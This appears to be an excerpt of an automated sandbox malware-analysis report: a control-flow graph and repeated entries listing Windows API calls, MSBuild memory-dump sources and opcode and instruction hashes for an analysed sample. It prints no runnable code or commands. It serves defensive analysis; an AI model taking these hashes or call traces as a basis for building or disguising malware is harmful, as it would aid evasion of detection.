                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2409 61e73d4-61e73fa 2517 61e73fa call 682dcd0 2409->2517 2518 61e73fa call 682dadf 2409->2518 2413 61e7400-61e7441 2519 61e7441 call 682e020 2413->2519 2520 61e7441 call 682df71 2413->2520 2521 61e7441 call 682e398 2413->2521 2416 61e7447-61e7488 2522 61e7488 call 682e020 2416->2522 2523 61e7488 call 682e970 2416->2523 2524 61e7488 call 682df71 2416->2524 2525 61e7488 call 682e5d7 2416->2525 2526 61e7488 call 682e874 2416->2526 2527 61e7488 call 682e398 2416->2527 2528 61e7488 call 682e9cf 2416->2528 2419 61e748e-61e74cf 2529 61e74cf call 682ea90 2419->2529 2530 61e74cf call 682ea30 2419->2530 2531 61e74cf call 682eaef 2419->2531 2422 61e74d5-61e7516 2532 61e7516 call 682ebb0 2422->2532 2533 61e7516 call 682eb50 2422->2533 2425 61e751c-61e7d7e KiUserExceptionDispatcher call 69b5368 KiUserExceptionDispatcher call 69b57c0 call 69b5bf0 2514 61e7d84-61e7dd5 2425->2514 2517->2413 2518->2413 2519->2416 2520->2416 2521->2416 2522->2419 2523->2419 2524->2419 2525->2419 2526->2419 2527->2419 2528->2419 2529->2422 2530->2422 2531->2422 2532->2425 2533->2425
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E77DC
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: b3783fd0e566a9de6e09aa4d788f027a5c9d70fc78027577d4a5af016dab934b
                                                                                    • Instruction ID: 5806e270ff8b5f6dc98d5135373dd31621304e8207489a4ea607ab64ae57c16c
                                                                                    • Opcode Fuzzy Hash: b3783fd0e566a9de6e09aa4d788f027a5c9d70fc78027577d4a5af016dab934b
                                                                                    • Instruction Fuzzy Hash: C4D18434902298CFDBA9EF34D88869DB7B2FF49306F1045E9D50A66250DB399AC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E77DC
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: e8e63ec7831c6b92a3afd585dccaf5a4f6976abcf3c72d71397a9a1353ba8b8f
                                                                                    • Instruction ID: 4c38b8473ba52d4f7f16bff6b079fc26d78a4f98c1f533dfc82b863988a7b417
                                                                                    • Opcode Fuzzy Hash: e8e63ec7831c6b92a3afd585dccaf5a4f6976abcf3c72d71397a9a1353ba8b8f
                                                                                    • Instruction Fuzzy Hash: 5AD18434902298CFDBA9EF34D88869DB7B2FF49306F1045E9D50AA6250DB399AC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E77DC
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: b04524552cafa7c2c36652092ef48d839c388306e167654f93aa5eba7b457d2f
                                                                                    • Instruction ID: 4557a1f069e291c2af6e96717f416a93420b6471f3483daa2f0315f6f72a70a6
                                                                                    • Opcode Fuzzy Hash: b04524552cafa7c2c36652092ef48d839c388306e167654f93aa5eba7b457d2f
                                                                                    • Instruction Fuzzy Hash: 57D18434902298CFDBA9EF34D88869DB7B2FF49306F1045E9D50A66250DB399EC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E77DC
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 18d266f0ebbb21c9971b6aaff559ae7a46062afa504b817b3a198199c64a571d
                                                                                    • Instruction ID: a1d2454ad6919a8fb9be3b60e5c0ddf75bfa07cafcb07be15d8bf1cee69b477a
                                                                                    • Opcode Fuzzy Hash: 18d266f0ebbb21c9971b6aaff559ae7a46062afa504b817b3a198199c64a571d
                                                                                    • Instruction Fuzzy Hash: DDC18434902298CFDBA9EF34D88869DB7B2FF49306F1045E9D50AA6250DB399EC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E77DC
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 4a33e6d3904854a231890766b91ed910f687a371eaaaf0585d1b7efd28a30737
                                                                                    • Instruction ID: 70eed93027eb131741da48169af3810f5d9e48db1af1e6134bbf4c0ea1e64d7c
                                                                                    • Opcode Fuzzy Hash: 4a33e6d3904854a231890766b91ed910f687a371eaaaf0585d1b7efd28a30737
                                                                                    • Instruction Fuzzy Hash: 7BC19434906298CFDBA9EF34D88869DB7B2FF49306F1045E9D50AA6250CB399EC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E77DC
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: c333839e5d7ad956fe7ae7946f25fec4d0e37060a286aca79c92d74e11ab1002
                                                                                    • Instruction ID: b47e646dfd8e43be809fa7a658590529bf776d21b0f1e2df39c7d73738bb6127
                                                                                    • Opcode Fuzzy Hash: c333839e5d7ad956fe7ae7946f25fec4d0e37060a286aca79c92d74e11ab1002
                                                                                    • Instruction Fuzzy Hash: BBC1A434906298CFDBA9EF30D88869DB7B2FF49306F1045E9D50A62250CB359EC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E77DC
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 334c8e4bb7cbd63076eac660d96c1964e53a04ad701af56c5a43aaacde7b20be
                                                                                    • Instruction ID: a670981614cd73e872667a525db1d390fb4443e746cda2da1523eae9a5cd6fef
                                                                                    • Opcode Fuzzy Hash: 334c8e4bb7cbd63076eac660d96c1964e53a04ad701af56c5a43aaacde7b20be
                                                                                    • Instruction Fuzzy Hash: 9DB193349062A8CFDBA9EF30D88869DB7B2FF49306F1045E9D50AA2250DB359EC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E77DC
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 3ad5b4d8604b74dbf2aab9b3633a805b71de9d80f97c6e458dda94328258f975
                                                                                    • Instruction ID: 57b461da20c966ad754dd72e4071cb092f10015d17e82329a3c2c4e525ee4669
                                                                                    • Opcode Fuzzy Hash: 3ad5b4d8604b74dbf2aab9b3633a805b71de9d80f97c6e458dda94328258f975
                                                                                    • Instruction Fuzzy Hash: C8B1A3349062A8CFDBA9EF30D88869DB7B2FF49306F1045E9D50AA2250DB359EC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E77DC
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 256c144e94ee24463e2215e32c4c5127181d46a23f32da8734989bcf1ea1c11a
                                                                                    • Instruction ID: b3f13475159047e17b269cc35fa9b552d42ad4f49f094bfbde73ab552343fd1d
                                                                                    • Opcode Fuzzy Hash: 256c144e94ee24463e2215e32c4c5127181d46a23f32da8734989bcf1ea1c11a
                                                                                    • Instruction Fuzzy Hash: 06B194349062A8CFDBA9EF34D88869DB7B2FF49306F1045E9D50AA2250DB359EC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E77DC
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: e8203a440ba574ea7c8536f2b10c34b467077ef6805909f1a66ff4ab173049df
                                                                                    • Instruction ID: 5f732da4aba36ccbf58b6d8a56e54948beadd120914d78501698131bc2198385
                                                                                    • Opcode Fuzzy Hash: e8203a440ba574ea7c8536f2b10c34b467077ef6805909f1a66ff4ab173049df
                                                                                    • Instruction Fuzzy Hash: 71A194349062A8CFDBA9EF30D88869DB7B2FF49306F1045E9D50A62250DB359EC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E77DC
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 93680ad08f87339bc6725cc23130eb5fe895d584e39847e82c8c01d19fd707e6
                                                                                    • Instruction ID: ca88a637df380f50459c1311d0e77ccab8667e7079c23c244c02e96396b8a1e5
                                                                                    • Opcode Fuzzy Hash: 93680ad08f87339bc6725cc23130eb5fe895d584e39847e82c8c01d19fd707e6
                                                                                    • Instruction Fuzzy Hash: CDA194349062A8CFDBA9EF34D88869DB7B2FF49306F1045E9D50AA2250DB359EC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E77DC
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 8844c3996bc28a9c0be4a21e93ba5eabf09fe71d670b1e9cbc71f86275ecf5f4
                                                                                    • Instruction ID: c29e69535eb328195301a40fbd22c70343d29901ee23f4e5d2147bca535fc61e
                                                                                    • Opcode Fuzzy Hash: 8844c3996bc28a9c0be4a21e93ba5eabf09fe71d670b1e9cbc71f86275ecf5f4
                                                                                    • Instruction Fuzzy Hash: B1A184349062A8CFDBA9EF34D88869DB7B2FF49306F1045E9D50AA2250DB359EC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E77DC
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: e99fcd7f47f61bdeb79c924fd1deabf2bc28a339d31eaa085308b1f703c81329
                                                                                    • Instruction ID: 90e7b2f5181999cc57138394fe38afc2ccbbc74e7bdde06141a40eef59f37f61
                                                                                    • Opcode Fuzzy Hash: e99fcd7f47f61bdeb79c924fd1deabf2bc28a339d31eaa085308b1f703c81329
                                                                                    • Instruction Fuzzy Hash: 7C9184349062A8CFDB69EF30D88869DB7B2FF89307F1045E9D50AA6250DB359E81CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E77DC
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 574771da459419aefec0116c3ee9374aeaa09b717bc36c23df736b0929b8de34
                                                                                    • Instruction ID: 093c9c60350a41c80c69c32cb42ce2d8f25bfcd6860ec7d26d7debeee90fdb96
                                                                                    • Opcode Fuzzy Hash: 574771da459419aefec0116c3ee9374aeaa09b717bc36c23df736b0929b8de34
                                                                                    • Instruction Fuzzy Hash: F79194349062A8CFDBA9EF30D88869DB7B2FF49306F1045E9D50AA6250DB359EC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E77DC
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 6143073e6ea1b84e9c906dab4f49ca80f28f8235527d827b5015389ea407743f
                                                                                    • Instruction ID: 9e6287f5329e8ec5c09a315002eaf7664d20b1594874ceb2690c0e3841053989
                                                                                    • Opcode Fuzzy Hash: 6143073e6ea1b84e9c906dab4f49ca80f28f8235527d827b5015389ea407743f
                                                                                    • Instruction Fuzzy Hash: 4D8184349062A8CFDBA9EF30D88869DB7B2FF49306F1045E9D50AA6250DB359E81CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 87c57fa9ab2309e3a823b99888f58e81959691629f6f9c87818e32b846cc9d51
                                                                                    • Instruction ID: 65adc758a4dd26bddfaa1c59706c138c4869de6416f1566efaafa43afed1348e
                                                                                    • Opcode Fuzzy Hash: 87c57fa9ab2309e3a823b99888f58e81959691629f6f9c87818e32b846cc9d51
                                                                                    • Instruction Fuzzy Hash: 69819534906268CFDB69EF30D88869DB7B2FF49306F1045E9D50AA6350DB359E81CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: e119ae12bd33ca1e7a7a9efcac389af025ae75a178843df99930ec39c5a68844
                                                                                    • Instruction ID: 1a9f78ff65d7fb4c334419d1287790667c5d0e9264fbe732436d2fccee492080
                                                                                    • Opcode Fuzzy Hash: e119ae12bd33ca1e7a7a9efcac389af025ae75a178843df99930ec39c5a68844
                                                                                    • Instruction Fuzzy Hash: 07719574906268CFDBA9EF30D88869DB7B2FF49306F1045E9D50AA2250DB359EC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: f06992ac2839a5020cf2c282cc244e5f391fd722cc36cde06dd343efcfbd5bd4
                                                                                    • Instruction ID: 7b1352cc1c0b1f90b3b9b62f9abeb217379d8367ff999e6c681a36e1e58290fe
                                                                                    • Opcode Fuzzy Hash: f06992ac2839a5020cf2c282cc244e5f391fd722cc36cde06dd343efcfbd5bd4
                                                                                    • Instruction Fuzzy Hash: 3C6195349062A8CFDBA9EF30D88869DB7B2FF49306F1045E9D50AA6250DB359EC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 202c2c5d8847776f9758556e94c32d2efe922955fad248ae8d7dc10f70f7f5f9
                                                                                    • Instruction ID: 7fe8db4aecb259c12e96d9b3893b1e41cfd62d092670d452dbc7d5dfa099499c
                                                                                    • Opcode Fuzzy Hash: 202c2c5d8847776f9758556e94c32d2efe922955fad248ae8d7dc10f70f7f5f9
                                                                                    • Instruction Fuzzy Hash: 14619334906268CFDBA9EF30D88869DB7B2FF49306F1045E9D50AA6290DB359E81CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.523442817.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_69b0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 325109593a8bc8401168c5b4021763db18ed867a847e14ad4c8a2ca059268bb0
                                                                                    • Instruction ID: 2da4c550ab9d791df91164fa1dad6c396d072136ba043d1836a8af3a3fd650f9
                                                                                    • Opcode Fuzzy Hash: 325109593a8bc8401168c5b4021763db18ed867a847e14ad4c8a2ca059268bb0
                                                                                    • Instruction Fuzzy Hash: 8A414772E043558FCB10DFB9C9042DEBBF5EF89210F18856AD419A7B90DB749885CBE1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 9a4bfb167347037a470d7960811df4e07adcba8660aec9d8a920629c161b6b57
                                                                                    • Instruction ID: 0ef3b82dcb4c0d0937c51e43c676062eee61793c05a667ba2ba864e8c7fc6eb9
                                                                                    • Opcode Fuzzy Hash: 9a4bfb167347037a470d7960811df4e07adcba8660aec9d8a920629c161b6b57
                                                                                    • Instruction Fuzzy Hash: EF519334902268CFDBA9EF30D88869DB7B2FF49306F1045E9D50AA6290DB359EC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: c1c0d65bebce00ee14e043bddc6b860cfed5d79b462e990a7d7ea56651b9670e
                                                                                    • Instruction ID: 3e133a720b365e8c65e1a8ba05b08c1fca0f6e838c924b3ea9b984ac45b4c18a
                                                                                    • Opcode Fuzzy Hash: c1c0d65bebce00ee14e043bddc6b860cfed5d79b462e990a7d7ea56651b9670e
                                                                                    • Instruction Fuzzy Hash: 2D51A534902268CFDBA9EF30D88869DB7B2FF49306F5045E9D50AA2250DB359EC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 058fce41f9f5368f3950b2d233a7652798aefbc1ca0218f363f54e226e0b8d4d
                                                                                    • Instruction ID: cf6be6f1185ff33e952ba592232a15500f0b2937e8a17b2369b7dfe67072fb87
                                                                                    • Opcode Fuzzy Hash: 058fce41f9f5368f3950b2d233a7652798aefbc1ca0218f363f54e226e0b8d4d
                                                                                    • Instruction Fuzzy Hash: 7551B534A02268CFDBA9EF30D88869DB7B2FF49306F1045E9D50AA6250DB359EC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 06825EE1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.523188959.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_6820000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: QueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3660427363-0
                                                                                    • Opcode ID: f9c12bba2f1786b10f4a33b21ee5144f59fe2db76897d635298e367e9cb7c6f3
                                                                                    • Instruction ID: 06bbf391eb5da78286832e72698193025acd530444b7e7dea6767728b2dc02cc
                                                                                    • Opcode Fuzzy Hash: f9c12bba2f1786b10f4a33b21ee5144f59fe2db76897d635298e367e9cb7c6f3
                                                                                    • Instruction Fuzzy Hash: EF4114B5E002699FCB10CFA9D884A9EBBF5BF48314F14802AE919EB350D7749945CF91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 7e37a380a04d4c0d534ba6d1d7ff6bb6f6ff32627359128d8924c47771d43726
                                                                                    • Instruction ID: dd49366d9439c90f4851a2372e0b74c3a9f5dcf09b96f13805bd325b669c03b7
                                                                                    • Opcode Fuzzy Hash: 7e37a380a04d4c0d534ba6d1d7ff6bb6f6ff32627359128d8924c47771d43726
                                                                                    • Instruction Fuzzy Hash: 8551B634902268CFDBA9EF30D88869DB7B2FF49306F5045E9D50AA6290DB359EC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?), ref: 06825C24
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.523188959.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_6820000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: Open
                                                                                    • String ID:
                                                                                    • API String ID: 71445658-0
                                                                                    • Opcode ID: 6745d7d29ff34631cbec6cb92e2a964ee1900642aacaa7707605485ce3169454
